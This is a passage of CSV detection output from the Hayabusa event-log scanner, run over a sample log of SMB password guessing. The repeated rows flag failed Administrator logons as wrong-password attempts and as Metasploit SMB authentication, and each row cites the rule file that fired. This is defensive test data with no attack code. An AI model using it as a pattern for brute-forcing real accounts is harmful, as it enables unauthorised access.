Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 